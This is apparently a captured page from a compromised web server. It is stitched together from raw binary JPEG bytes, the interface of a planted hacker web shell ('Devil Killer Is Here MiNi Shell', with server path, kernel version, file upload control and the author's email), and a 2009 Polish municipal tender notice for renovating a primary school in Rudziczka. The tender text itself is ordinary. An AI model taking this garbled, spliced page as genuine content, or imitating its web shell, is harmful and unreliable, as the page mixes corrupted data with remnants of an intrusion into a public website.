JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090211/36267-N-2009.html

<p class="kh_header"><b>Suszec: Remont, przebudowa, rozbudowa i termomodernizacja budynku szkoły podstawowej w Rudziczce, zgodnie z dokumentacją projektową.</b><br>
<b>Numer ogłoszenia: 36267 - 2009; data zamieszczenia: 11.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suszec , ul. Lipowa 1, 43-267 Suszec, woj. śląskie, tel. 032 44993050, faks 032 4493051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.suszec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont, przebudowa, rozbudowa i termomodernizacja budynku szkoły podstawowej w Rudziczce, zgodnie z dokumentacją projektową..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zgodnie z pkt 3 SIWZ:
3.1	Przedmiotem zamówienia jest realizacja inwestycji pn.: Remont, przebudowa, rozbudowa i termomodernizacja budynku szkoły podstawowej w Rudziczce, zgodnie z dokumentacją projektową, zwanej dalej zamówieniem.

3.2	Zakres przedmiotu zamówienia obejmuje wykonanie przebudowy, rozbudowy i termomodernizacji budynku wraz z częściową zmianą sposobu użytkowania części szkolnej i części mieszkalnej na przedszkole dwuoddziałowe z częścią gospodarczą oraz remont dobudowanej (nowej) części budynku. 
W zakresie robót związanych z przebudową, rozbudową i termomodernizacją budynku należy wykonać:
-	roboty rozbiórkowe związane ze zmianą przeznaczenia użytkowego budynku (rozebranie ścianek działowych, daszków nad wejściami, schodów zewnętrznych, powiększenie otworów okiennych i drzwiowych),
-	nowe schody zewnętrzne, podjazd dla osób niepełnosprawnych, zadaszenia nad wejściami,
-	izolacje pionowe i poziome budynku (izolacja pozioma wykonana metodą iniekcji krystalicznej),
-	modernizację instalacji c.o., instalacji wod.-kan., instalacji elektrycznej, instalacji wentylacji,
-	demontaż istniejącego źródła ogrzewania (kocioł węglowy), montaż kotła gazowego o mocy 70 kW, 
-	docieplenie ścian zewnętrznych styropianem gr. 12 cm i dachu styropapą gr. 20 cm,
-	otynkowanie i zmianę kolorystyki ścian zewnętrznych,
-	tynki, gładzie oraz malowanie ścian i sufitów wewnątrz budynku,
-	wymianę stolarki okiennej i drzwiowej,
-	drenaż opaskowy długości 84,00 m wokół budynku, 
-	ogrodzenie z podmurówką z cegły klinkierowej na fundamencie betonowym.
	
	W zakresie robót związanych z remontem dobudowanej części budynku należy wykonać:
-	naprawę uszkodzonych tynków na elewacjach,
-	naprawę izolacji przeciwwilgociowych ścian zewnętrznych i murków przy wejściach,
-	naprawę nawierzchni brukowej w obrębie rur spustowych,
-	zmianę kolorystyki elewacji wraz ze zmianą kolorystyki stolarki okiennej,
-	malowanie ścian, sufitów, balustrad i osłon grzejnikowych wewnątrz budynku.


Zakres robót nie obejmuje wyposażenia budynku oraz wyposażenia zagospodarowanego terenu wokół obiektu szkolnego. Wybór wykonawcy na realizację zamówienia związanego z wyposażeniem zostanie przeprowadzony w oddzielnym zamówieniu publicznym, po realizacji omawianego przedmiotu zamówienia.

3.3	Zamawiający oczekuje na dofinansowanie przedmiotu zamówienia z Regionalnego Programu Operacyjnego Województwa Śląskiego (RPO). W przypadku nieotrzymania dofinansowania z RPO, zamawiający zamierza zawrzeć z Wojewódzkim Funduszem Ochrony Środowiska i Gospodarki Wodnej w Katowicach (WFOŚiGW) umowę pożyczki na dofinansowanie przedmiotu umowy. W związku z powyższym, Zamawiający zastrzega sobie możliwość dokonania w każdym czasie, w trakcie realizacji zamówienia zmian harmonogramu, o którym mowa w § 2 pkt 3 istotnych postanowień umowy - zał. nr 2 do SIWZ i wprowadzenia w jego miejsce harmonogramu rzeczowo-finansowego, który stanowić będzie załącznik do podpisanej umowy dofinansowania lub pożyczki. Na tę okoliczność Wykonawca będzie zobowiązany do realizacji zamówienia zgodnie z harmonogramem rzeczowo-finansowym, stanowiącym załącznik podpisanej umowy dofinansowania lub pożyczki. Zmiana harmonogramu nie będzie miała wpływu na fakturowanie robót. Etapy realizacji zamówienia, o których mowa w §2 pkt 3 istotnych postanowień umowy - zał. nr 2 do SIWZ nie ulegną zmianie.

3.4	Opis przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV): 

45111100-9   Roboty w zakresie burzenia
45111220-6   Roboty w zakresie usuwania gruzu
45233200-1   Roboty w zakresie różnych nawierzchni
45261000-4   Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty
45261100-5   Wykonanie konstrukcji dachowych
45262300-4   Betonowanie
45262500-6   Roboty murarskie i murowe
45320000-6   Roboty izolacyjne
45342000-6   Wznoszenie ogrodzeń
45410000-4   Tynkowanie
45421000-4   Roboty w zakresie stolarki budowlanej
45421141-4   Instalowanie przegród
45421160-3   Instalowanie wyrobów metalowych
45431000-7   Kładzenie płytek
45432111-5   Kładzenie wykładzin elastycznych
45432113-9   Kładzenie parkietu
45442100-8   Roboty malarskie
45233222-1   Roboty budowlane w zakresie układania chodników i asfaltowania
45442000-7   Nakładanie powierzchni kryjących
45311100-1   Roboty w zakresie okablowania elektrycznego 
45312311-0   Montaż instalacji piorunochronnej 
45330000-9   Roboty instalacyjne wodno-kanalizacyjne i sanitarne
45232130-2   Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej
45331000-6   Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych
45331100-7   Instalowanie centralnego ogrzewania
45331110-0   Instalowanie kotłów
45331210-1   Instalowanie wentylacji
3.5	Szczegółowy opis przedmiotu zamówienia stanowią:
a)	przedmiar robót (roboty ogólnobudowlane) - zał. 6.1 do SIWZ,
b)	przedmiar robót (instalacja wod - kan, drenaż opaskowy) - zał. 6.2 do SIWZ,

c)	przedmiar robót (instalacja c.o., wentylacja) - zał. 6.3 do SIWZ,
d)	przedmiar robót (branża elektryczna) - zał. 6.4 do SIWZ,
które obejmują zakres robót związany z przebudową, rozbudową i termomodernizacją budynku Szkoły Podstawowej w Rudziczce i 
e)	przedmiar robót (roboty ogólnobudowlane) - zał. 6.5 do SIWZ,
który obejmuje zakres robót związany z remontem w dobudowanej, nowej części budynku szkolnego w Rudziczce,
f)	projekt budowlany wraz z projektem wykonawczym (branża architektura i konstrukcja) - zał. 7.1 do SIWZ,
g)	projekt budowlany wraz z projektem wykonawczym (elementy zagospodarowania terenu, wykończenie) - zał. 7.2 do SIWZ,
h)	projekt budowlany wraz z projektem wykonawczym (projekt detali i szczegółów) - zał. 7.3 do SIWZ,
i)	projekt budowlany wraz z projektem wykonawczym (branża elektryczna) - zał. 7.4 do SIWZ,
j)	projekt budowlany wraz z projektem wykonawczym (instalacja wod - kan i drenażu opaskowego) - zał. 7.5 do SIWZ,
k)	projekt budowlany wraz z projektem wykonawczym (instalacja c.o. i wentylacja) - zał. 7.6 do SIWZ,
które obejmują zakres robót związany z przebudową, rozbudową i termomodernizacją budynku Szkoły Podstawowej w Rudziczce i 
l)	projekt budowlany wraz z projektem wykonawczym (roboty ogólnobudowlane) - zał. 7.7 do SIWZ,
który obejmuje zakres robót związany z remontem w dobudowanej, nowej części budynku szkolnego w Rudziczce,
m)	informacja BIOZ - zał. 8 do SIWZ,
która dotyczy wszystkich robót związanych z realizacją przedmiotu zamówienia,        
i zwane są w dalszej treści SIWZ dokumentacją projektową oraz:
n)	specyfikacja techniczna wykonania i odbioru robót (roboty ogólnobudowlane) - zał. nr 9.1 do SIWZ,
o)	specyfikacja techniczna wykonania i odbioru robót (instalacja elektryczna) - zał. nr 9.2 do SIWZ,
p)	specyfikacja techniczna wykonania i odbioru robót (instalacja wod - kan i drenaż opaskowy) - zał. nr 9.3 do SIWZ,
q)	specyfikacja techniczna wykonania i odbioru robót (instalacja c.o. i wentylacji) - zał. nr 9.4 do SIWZ,
które obejmują zakres robót związany z przebudową, rozbudową i termomodernizacją budynku Szkoły Podstawowej w Rudziczce i 
r)	specyfikacja techniczna wykonania i odbioru robót (roboty ogólnobudowlane)  - zał. nr 9.5 do SIWZ,
który obejmuje zakres robót związany z remontem w dobudowanej, nowej części budynku szkolnego w Rudziczce.

Uwaga:
Przedstawione w w.w dokumentacji projektowej oraz w specyfikacji technicznej wykonania i odbioru robót wskazania na urządzenia techniczne i materiały z podaniem producenta, należy traktować jako przykładowe, ze względu na zasady ustawy prawo zamówień publicznych, a zwłaszcza art. 29. Oznacza to, że wykonawcy mogą zaproponować inne rozwiązania, z zachowaniem odpowiednich, równoważnych, tj. nie gorszych niż wskazane w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót, parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem projektu, z zapewnieniem uzyskania przez wykonawcę i na jego koszt  wszelkich ewentualnych uzgodnień, w tym w razie potrzeby autora dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót.
3.6	 Na podstawie przedmiarów robót, stanowiących zał. nr 6.1, 6.2, 6.3, 6.4 i 6.5 do SIWZ, zostały opracowane formularze przedmiaru robót, stanowiące zał. nr 1.A, 1.B, 1.C, 1.D i 1.E do formularza oferty, udostępnione na stronie internetowej w  elektronicznej wersji EXEL, WORD (strony tytułowe) i PDF. Przedmiary robót - zał. 6.1 - 6.5, stanowią dokumenty pomocnicze przy wyliczaniu poszczególnych pozycji w formularzach przedmiaru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.12.20-6, 45.23.32.00-1, 45.26.10.00-4, 45.26.11.00-5, 45.26.23.00-4, 45.26.25.00-6, 45.32.00.00-6, 45.34.20.00-6, 45.41.00.00-4, 45.42.10.00-4, 45.42.11.41-4, 45.42.11.60-3, 45.43.10.00-7, 45.43.21.11-5, 45.43.21.13-9, 45.44.21.00-8, 45.23.32.22-1, 45.44.20.00-7, 45.31.11.00-1, 45.31.23.11-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości 25.000,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z pkt 8 SIWZ:
Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków. Oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania tych warunków.

8.1	O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych:

a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
8.2	Oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny tych warunków:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert:
-	dokument musi potwierdzać, że profil działalności wykonawcy odpowiada przedmiotowi zamówienia oraz, że wykonawca jest uprawniony do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi,
-	w przypadku składania oferty przez wspólników spółki cywilnej, należy dołączyć poza zaświadczeniami o wpisie do ewidencji działalności gospodarczej wszystkich wspólników spółki, wypis z umowy spółki cywilnej, w celu określenia sposobu reprezentacji spółki lub uchwałę wspólników regulującą sposób reprezentacji spółki (jeżeli w ten sposób został określony),
-	do wypisu z rejestru lub zgłoszenia do ewidencji działalności gospodarczej należy dołączyć pełnomocnictwo, jeżeli zostało ustanowione, określające zakres i sposób reprezentacji, zgodnie z pkt 8.6 niniejszej SIWZ,
b)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert:
-	dotyczy tylko podmiotów zbiorowych, 
d)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
e)	oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, zgodnie z treścią zał. nr 3,
f)  wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z   podaniem   ich   wartości oraz daty i miejsca wykonania oraz załączenia dokumentów (np. referencje, opinie, protokoły odbioru) potwierdzających, że roboty te zostały wykonane należycie, zgodnie z zał. nr 4:
-	wymagane minimum:  1 robota budowlana, o wartości nie mniejszej niż wartość ceny ofertowej brutto, oferowanej przez wykonawcę w przedmiotowym zamówieniu i odpowiadająca swoim rodzajem przedmiotowi zamówienia, z załączeniem stosownych dokumentów potwierdzających należyte jej wykonanie,
g)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,  na lub zgodnie z zał. nr 5:
-	wymagane minimum: wykonawca do realizacji przedmiotowego zamówienia musi dysponować co najmniej: jedną osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,  niezbędnymi do realizacji przedmiotu zamówienia,
-	do wykazu wykonawca jest zobowiązany dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie (zał. nr 5), wykonawca wskazał osoby, którymi będzie dysponował,
h)	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, wymienione w zał. nr 5 do SIWZ, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.:
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, wymagane przepisami ustawy Prawo budowlane,
-	dla każdej z osób wymienionych w zał. nr 5 wykonawca jest zobowiązany załączyć aktualne w dniu otwarcia ofert zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego (warunek konieczny do posługiwania się wymaganymi uprawnieniami, zgodnie z przepisami ustawy Prawo budowlane).

8.3	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 8.2 lit. a, b, c, d, składa dokumenty zgodnie z postanowieniami pgf. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich zamawiający może żądać od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. 

8.4	Pozostałe wymagania do udziału w postępowaniu:
a)	udzielenie 60 - miesięcznej gwarancji na wykonany przedmiot zamówienia,
-	oświadczenie w celu potwierdzenia spełniania w.w warunku zawiera formularz oferty, zał. nr 1, 
b)	złożenie wypełnionego druku formularza oferty, zgodnie z treścią zał. nr 1 do SIWZ, w tym m.in. złożenie oświadczenia o udziale podwykonawców w realizacji zamówienia oraz wskazania części zamówienia, których wykonanie zostanie powierzone podwykonawcom,
c)	złożenie wypełnionych załączników 1.A (roboty ogólnobudowlane), 1.B (instalacja wod - kan, drenaż opaskowy), 1.C (instalacja c.o., wentylacja), 1.D (branża elektryczna) - dot. przebudowy, rozbudowy i termomodernizacji szkoły oraz załącznika 1.E (roboty ogólnobudowlane) - dot. remontu nowej części szkoły.

8.5	Zamawiający dokona oceny spełniania warunków wymaganych od wykonawców w oparciu o wyżej wymienione dokumenty. Ocena ta zostanie przeprowadzona wg formuły: spełnia - nie spełnia. 
Nie spełnienie któregokolwiek warunku określonego w pkt 8, będzie skutkować wykluczeniem wykonawcy z postępowania bądź odrzuceniem oferty.

8.6	Dokumenty, o których mowa w pkt 8.2, 8.3 i 8.4 muszą być przedstawione w formie oryginału, lub kopii poświadczonej (na każdej zapisanej stronie kopii) za zgodność z oryginałem przez wykonawcę, z zastrzeżeniem pkt 8.7 SIWZ. Za konieczne a jednocześnie wystarczające będzie złożenie na kopii własnoręcznego                              podpisu poprzedzonego dopiskiem: za zgodność, przez osobę(-y) uprawnioną(-e) do składania oświadczeń woli w imieniu wykonawcy. 
Za osoby uprawnione do składania oświadczeń woli w imieniu wykonawców uznaje się osoby wymienione jako uprawnione do składania oświadczeń woli:
a)	w prowadzonych przez sądy rejestrach, 
b)	w Ewidencji Działalności Gospodarczej, 
c)	osoby  legitymujące się odpowiednim pełnomocnictwem:
-	w przypadku podpisania oferty przez pełnomocnika wykonawcy, pełnomocnictwo określające zakres reprezentacji, musi być dołączone do oferty,
-	w przypadku złożenia pełnomocnictwa, pełnomocnictwo musi być złożone w formie oryginału lub kopii potwierdzonej notarialnie,
d)	w umowie (dot. spółki cywilnej) lub uchwale wspólników.
Dokumenty winny być ułożone w kolejności jw.

8.7	Wypełnione załączniki nr 1, 1.A, 1.B, 1.C, 1.D, 1.E, 3, 4 i 5 do SIWZ należy złożyć w oryginale..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> j.w..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.suszec.iap.pl/6585,13376,13608/13608/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Suszec
ul. Lipowa 1
43-267 Suszec
Zamawiający przekaże na wniosek wykonawcy w terminie 5 dni SIWZ. Zamawiający będzie żądał opłaty za SIWZ za koszt jej druku i przekazania..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2009 godzina 10:00, miejsce: Urząd Gminy Suszec
ul. Lipowa 1
43-267 Suszec
sekretariat (I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com